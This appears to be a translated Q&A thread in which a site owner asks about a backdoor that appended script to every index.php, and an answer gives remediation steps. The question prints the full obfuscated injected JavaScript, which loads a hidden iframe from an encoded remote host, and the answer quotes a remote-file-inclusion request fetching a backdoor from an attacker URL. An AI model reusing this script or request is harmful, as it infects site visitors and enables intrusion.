caw*_*caw 8 javascript php security virus trojan
我的网站被木马脚本感染了.
有人设法创建/上传名为"x76x09.php"或"config.php"的文件到我的网站空间的根目录.其大小为44287字节,其MD5校验和为8dd76fc074b717fccfa30b86956992f8.我用Virustotal分析了这个文件.这些结果表明它是"Backdoor/PHP.C99Shell"或"Trojan.Script.224490".
此文件已在创建时执行.所以它必须自动发生.此文件将以下恶意代码添加到我的网站空间上的每个index.php的末尾.
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
在我的页面上显示该代码后,用户报告在Firefox中弹出一个蓝色面板.它要求他们安装一个插件.现在他们中的一些人在他们的PC上有Exploit.Java.CVE-2010-0886.a.
虽然我关闭了allow_url_fopen和allow_url_include,但确实发生了感染.我的主人说这个文件没有通过FTP上传.
所以我的问题是:
非常感谢你提前!我真的需要帮助.
小智 7
我们看到的许多被黑客攻击的网站都是PC上的病毒导致的,这些病毒用于将FTP文件传输到受感染的网站.病毒以各种方式窃取FTP密码 - 但主要是两种.
首先,如果您使用像FileZilla这样的免费FTP程序,您应该知道这些程序将其保存的登录凭据存储在纯文本文件中.病毒很容易找到这些,读取它们并将信息发送到服务器,然后服务器使用有效凭据登录到FTP,将某些文件复制到自身,感染它们然后将它们发送回网站.通常它也会将这些"后门"shell脚本复制到网站上,以便在更改FTP密码时,它们仍然可以重新感染网站.
该病毒还"嗅探"了FTP流量.由于FTP以纯文本形式传输包括用户名和密码在内的所有数据,因此病毒很容易以这种方式查看和窃取信息.
然而,很多时候,当我们看到导致感染的后门时,通常是网站上某处的远程文件包含漏洞的结果.黑客一直在尝试添加一个指向其后门之一的URL到任何Request字符串的末尾.因此,在访问日志中,您可能会看到以下内容:
/path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt ????
路径/文件夹字符串仅用于演示目的.
有时该命令有效,并且他们能够将id.txt复制到目标网站,因此有一个后门shell脚本,他们可以从中操作文件.
更改所有密码 - FTP,数据库,cPanel或其他管理界面.
扫描所有PC以查找病毒.
更改为SFTP.
检查所有文件夹的755权限和644的所有文件.这是标准的.
如果是SQL注入,则感染不会在文件的末尾.它会在某个地方进行SQL调用以生成内容.
是.有了今天的后门,攻击者可以并且可能已经查看了保存MySQL数据的config.php文件.
更改所有密码.
您必须更新所有内容,包括您可能已安装的任何php库.
运行phpsecinfo并通过修改.htaccess或php.ini删除所有红色和尽可能多的黄色.
删除所有文件和文件夹的写权限你的web root(chmod 500 -R /var/www && chown
www-root /var/www)chown应该是用户运行php的任何东西,所以做一个<?php system('whoami');?>来解决这个问题.
更改所有密码,如果可以,请使用sftp或ftps.
FILE从您的php应用程序使用的MySQL帐户中删除权限.